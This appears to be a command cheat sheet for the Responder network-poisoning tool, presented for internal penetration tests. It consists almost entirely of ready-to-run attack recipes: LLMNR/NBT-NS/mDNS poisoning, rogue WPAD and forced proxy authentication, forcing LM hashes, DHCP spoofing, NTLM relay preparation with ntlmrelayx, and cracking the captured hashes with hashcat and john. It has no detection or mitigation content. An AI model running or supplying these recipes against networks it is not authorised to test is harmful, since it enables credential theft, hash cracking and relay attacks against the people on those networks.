responder
LLMNR/NBT-NS/mDNS poisoner for credential capture.
Quickstart
sudo responder -I eth0
sudo responder -I eth0 -A
sudo responder -I eth0 -wF
Core Concepts
| Concept |
Description |
| LLMNR |
Link-Local Multicast Name Resolution |
| NBT-NS |
NetBIOS Name Service |
| mDNS |
Multicast DNS |
| Poisoning |
Answer queries to capture hashes |
Syntax
sudo responder -I <interface> [options]
Options
Interface
| Option |
Description |
-I <iface> |
Network interface |
-i <ip> |
Local IP (if not auto) |
Modes
| Option |
Description |
-A |
Analyze mode (passive) |
-w |
WPAD rogue server |
-F |
Force WPAD auth |
-P |
Force proxy auth |
-b |
Return basic HTTP auth |
Servers
| Option |
Description |
-r |
Respond to netbios wredir |
-d |
Enable DHCP responses |
-D |
DHCP domain |
-f |
Fingerprint hosts |
Protocols
| Option |
Description |
--lm |
Force LM hashing |
--disable-ess |
Disable ESS |
Logging
| Option |
Description |
-v |
Verbose |
-e <ip> |
External IP (NAT) |
Recipes
Basic Poisoning
sudo responder -I eth0
sudo responder -I eth0 -v
sudo responder -I eth0 -A
WPAD Attack
sudo responder -I eth0 -w
sudo responder -I eth0 -wF
sudo responder -I eth0 -wFP
Capture NTLMv2
sudo responder -I eth0
Force LM Hashes
sudo responder -I eth0 --lm
Specific Network
sudo responder -I eth0 -i 192.168.1.100
With DHCP
sudo responder -I eth0 -d
sudo responder -I eth0 -d -D target.local
Fingerprinting
sudo responder -I eth0 -f
Hash Cracking
ls /usr/share/responder/logs/
hashcat -m 5600 hashes.txt wordlist.txt
john --format=netntlmv2 hashes.txt
Configuration
sudo nano /usr/share/responder/Responder.conf
Common Scenarios
Internal Pentest
sudo responder -I eth0 -A
sudo responder -I eth0 -wFPv
Relay Attack Prep
sudo responder -I eth0
MultiRelay
sudo responder -I eth0 --disable-ess
ntlmrelayx.py -tf targets.txt -smb2support
Output & Parsing
cat /usr/share/responder/logs/*NTLM*
cat /usr/share/responder/logs/*NTLMv2* | sort -u > hashes.txt
tail -f /usr/share/responder/logs/Responder-Session.log
Troubleshooting
| Issue |
Solution |
| No hashes |
Check interface, network |
| Port in use |
Stop conflicting services |
| Permission denied |
Run with sudo |
| No traffic |
Verify same subnet |
References